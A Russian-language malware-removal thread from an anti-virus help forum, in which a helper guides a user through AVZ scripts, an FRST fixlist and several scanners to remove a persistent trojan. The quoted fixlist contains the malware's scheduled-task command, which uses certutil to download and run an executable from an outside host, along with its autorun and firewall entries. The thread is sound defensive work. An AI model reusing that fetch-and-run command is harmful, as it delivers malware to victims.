Здравствуйте! Помогите избавиться от вируса. Удалял я его много раз, в т.ч. с помощью перезагрузки с диска Kaspersky Rescue Disk. Однако через короткое время он снова появляется.
Здравствуйте! Помогите избавиться от вируса. Удалял я его много раз, в т.ч. с помощью перезагрузки с диска Kaspersky Rescue Disk. Однако через короткое время он снова появляется.
Уважаемый(ая) Demonic Tutor, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
![]()
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Выполните скрипт в AVZ
Код:begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; DeleteService('Winmon'); DeleteService('WinmonProcessMonitor'); DeleteService('WinmonFS'); QuarantineFile('C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe',''); QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys',''); QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys',''); SetServiceStart('WinDefender', 4); DeleteService('WinDefender'); TerminateProcessByName('c:\windows\windefender.exe'); QuarantineFile('c:\windows\windefender.exe',''); TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\mrt.exe'); QuarantineFile('c:\users\user\appdata\local\temp\csrss\mrt.exe',''); TerminateProcessByName('c:\windows\rss\csrss.exe'); QuarantineFile('c:\windows\rss\csrss.exe',''); TerminateProcessByName('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe'); QuarantineFile('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe',''); DeleteFile('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','32'); DeleteFile('c:\windows\rss\csrss.exe','32'); DeleteFile('c:\users\user\appdata\local\temp\csrss\mrt.exe','32'); DeleteFile('c:\windows\windefender.exe','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CrimsonThunder'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CloudNet'); DeleteFile('C:\Windows\system32\Tasks\csrss','32'); DeleteFile('C:\Windows\Tasks\RegTask.job','32'); DeleteFile('C:\Windows\system32\Tasks\MRT','32'); DeleteFile('C:\Windows\system32\Tasks\RegTask','32'); DeleteFile('C:\Windows\system32\Tasks\ReimageUpdater','32'); DeleteFile('C:\Windows\system32\Tasks\ScheduledUpdate','32'); DeleteFile('C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe','32'); DeleteFile('C:\Windows\System32\drivers\Winmon.sys','32'); DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','32'); DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end.
- Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.Код:begin CreateQurantineArchive('c:\quarantine.zip'); end.
Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Новые логи
Скачайте Farbar Recovery Scan Toolи сохраните на Рабочем столе.
- Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Отчеты, полученные в пунктах 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Пожалуйста.
1. Откройте Блокнот и скопируйте в него приведенный ниже текст
2. Нажмите Файл – Сохранить какКод:CreateRestorePoint: HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\...\Run: [CrimsonThunder] => C:\Windows\rss\csrss.exe [3158016 2018-06-26] () <==== ATTENTION HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\...\Run: [CloudNet] => C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-06-26] (EpicNet Inc.) <==== ATTENTION HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://webalta.ru/search HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://webalta.ru/search Toolbar: HKLM - No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aaaaphcodaeekobnmpkdljikkcogmgmb CHR HKLM\...\Chrome\Extension: [aaaaphcodaeekobnmpkdljikkcogmgmb] - C:\Users\USER\AppData\Local\APN\GoogleCRXs\aaaaphcodaeekobnmpkdljikkcogmgmb_7.15.4.0.crx [2012-08-07] R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder) R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [28368 2018-06-26] () [File not signed] <==== ATTENTION 2018-06-26 12:04 - 2018-06-26 12:04 - 000028368 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2018-06-22 12:24 - 2018-06-22 12:24 - 000000000 ____D C:\Users\USER\AppData\Roaming\EpicNet Inc Task: {18478172-FA22-498B-AF02-38D83AED5BDB} - no filepath Task: {885C87AA-D031-4A47-B20F-63E3B42BFE8E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {8A34A695-6DC7-4F5B-85E2-690E19C777A8} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION Task: {A4339261-C9AA-4B32-9AC1-FC93969185FA} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-26] () <==== ATTENTION Task: {D3F6F725-37E8-42EB-A58A-18D80273C481} - \ReimageUpdater -> No File <==== ATTENTION Task: {D8783B67-BCB5-4403-AB4C-95B5AC7E4D3C} - System32\Tasks\MRT => C:\Users\USER\AppData\Local\Temp\csrss\mrt.exe [2018-06-26] () <==== ATTENTION C:\Users\USER\AppData\Local\Temp\csrss AlternateDataStreams: C:\ProgramData\TEMP:AF4CCAAD [111] AlternateDataStreams: C:\Users\USER\Local Settings:wa [146] AlternateDataStreams: C:\Users\USER\AppData\Local:wa [146] AlternateDataStreams: C:\Users\USER\AppData\Local\Application Data:wa [146] AlternateDataStreams: C:\Users\Все пользователи\TEMP:AF4CCAAD [111] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\05583667.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\19953295.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\20453980.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\22212048.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\23813818.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\24258072.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\25757988.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31280338.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\32944514.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\40887225.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\44342232.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\50273139.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\59496168.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\7B3CA26D.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\7B3CA26D61.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\80226886.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\81834799.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\84466124.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89798466.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\99105427.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\05583667.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\19953295.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\20453980.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\22212048.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\23813818.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\24258072.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\25757988.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31280338.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\32944514.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\40887225.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\44342232.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\50273139.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\59496168.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\7B3CA26D.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\7B3CA26D61.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\80226886.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\81834799.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\84466124.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\89798466.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\99105427.sys => ""="Driver" FirewallRules: [{750341F7-DD77-4C8E-B18D-2AC529703F33}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{AB3EB9C9-A00E-4007-A1A5-B4F2F518421F}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{1188DB34-1547-4A13-90B9-5AE67A6E53B9}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{247219A1-FCBF-48EC-AE51-B9C2D81A88C4}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{C39A9424-5D7F-40C1-9BE5-5D78926564B5}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{10C1BB8A-5BCA-47D4-91F4-1A9FA4065F30}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{C7CD461F-B605-4C27-8534-F5949705A044}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{0441BB55-B9A6-4787-8B07-EC61D2D7595D}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{3E580E54-4DCD-4EA5-AAE0-27EDD4322584}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{30C476BA-C8B0-4DFE-B56C-91D85DD96380}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{1FEA185D-1CE0-4B0B-BDB4-34A6A40568F9}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{EDF00315-2ADF-414E-AE32-18F4EF02495B}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{4A57745C-48B8-4DBB-8BD9-70030499AFDB}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{C2205935-CEF3-4FFD-8E0E-C8CD6447DC5B}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{4B2F17F4-DA3E-44E8-97DC-F6EEAE965746}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{00749DE9-AD0C-4656-9262-E052D0F2ECDD}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{5A8100A8-8825-4F20-BBB9-C309DA88E67A}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{CFDA3BF3-AA3B-4354-A44E-0166ABBEE5E1}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{403C59CF-549C-46FE-8986-44773FD2770D}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{D9DBE9F9-946B-46AC-A09D-A6D7FFD765EF}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{D059CA85-1EC4-4D12-97E9-A6446E023451}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{0387F5E4-698D-42C3-B329-F9128483CA5F}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{62ACE4FC-F756-420B-A363-DF65E477EF9E}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{6F7EE220-372B-43AD-A2CA-4CB32FE626F9}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{97EE814E-C652-41C5-A683-8741DDA19EB7}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{27C1A2C3-C788-4D43-8786-57C3E2D4B97D}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{B14C472B-F4AA-477D-9113-B4335ECA0E5B}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{EFD7FCA3-DF39-4B79-AE7E-C3313C118AF9}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{BFF45D60-D903-40EF-933F-2A220B44D6F8}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{4967E8F8-E855-4F43-9633-AD895C141A9F}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{53B8A795-6D1A-432B-8131-CB7799B8EE44}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{28865E0E-1C3E-4BB4-8671-A756A5F63B28}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{A7823EFD-4853-4489-B470-85A7D405EEF4}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{1B88AFEC-D154-4D91-A343-0FAE98E02E9C}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{D01BE02B-E643-4DA8-94FC-9A6FCC65E316}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{3AE3BE43-8EA7-474F-A687-5E4EF3EEDDAC}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{93EE460B-3803-4716-8270-C46A5F37318D}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{BF09547A-DE5B-441C-BCED-57F379428297}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{6C29BB3B-9C48-4B4A-B225-49487C93B95A}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{B2CF3FA3-F208-474F-A36B-630702294696}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{6B301E7E-AD53-45EB-B042-146207193AF9}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{8EF82027-8E47-42CC-89CB-F4A59CF1EE0E}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{3B241607-DF4B-4973-8D1C-F46FF426200C}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{C29ADA70-EEA7-4FDA-8641-F70029E23DBD}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{62614864-F295-492B-992D-D6143673509D}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{48A1B2C9-2324-488A-9EC7-DA9E776B1905}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{AC4D1474-12AF-4632-B972-0C888AC6C559}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{8F278127-89DF-49AE-8213-42A09312688B}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{AC2102D1-E3A6-403C-8DCA-651CEED9E4DE}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{D8494B26-A745-445C-BE02-1290F47FAF29}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{7B5AB93C-C63E-4101-A3A6-4E35360E1CD5}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{0C54DDB1-0C08-4479-9D2B-596B36A08BB5}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{57281BA0-0A46-423F-966B-74CFE6BF5A49}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{E41A8B0F-AF18-42DB-A7E0-E0284697E5D8}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe Reboot:
3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
4. Укажите Тип файла – Все файлы (*.*)
5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
- Обратите внимание: будет выполнена перезагрузка компьютера.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Пожалуйста. Только перезагрузки не было.
- - - - -Добавлено - - - - -
Я так понимаю, что вирус вмешался в работу программы, возможно. Вот файл созданный, как необходимо надеюсь( с перезагрузкой).
Сделайте лог МВАМ
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
лог МВАМ
Удалите в МВАМ все найденное
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Все удалил. Однако до конца не вылечился, т.к. установив ознакомительную версию МВАМ, постоянно получаю уведомления об атаках, типа
Trojan.MalPack 28.06.18 8:42 Файл C:\Users\User\AppData\Local\Temp\939635975\app.exe .
За день пришло около 10 такого рода предупреждений от МВАМ.
Сделайте лог TDSSkiller
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Проверка TDSSkiller угроз не обнаружила, в т.ч. со всеми параметрами проверки.
Вы лог прикрепите к сообщению. Найти его можно на диске С
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Пожалуйста.
Тогда запускаем тяжелую артиллерию.
Скачайте ComboFix здесь и сохраните на Рабочий стол.
1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет, пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.
2. Запустите combofix.exe, когда процесс завершится, файл C:\ComboFix.txt прикрепите к сообщению.
Примечание: В случае, если ComboFix не запускается, переименуйте combofix.exe в [email protected]
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Пожалуйста.
Папку c:\windows\rss удалите вручную (она скрытая)
Что с проблемой?
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Вот уже 3 часа спокойно. Надеюсь, это победа! Большое спасибо!
Уважаемый(ая) Demonic Tutor, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.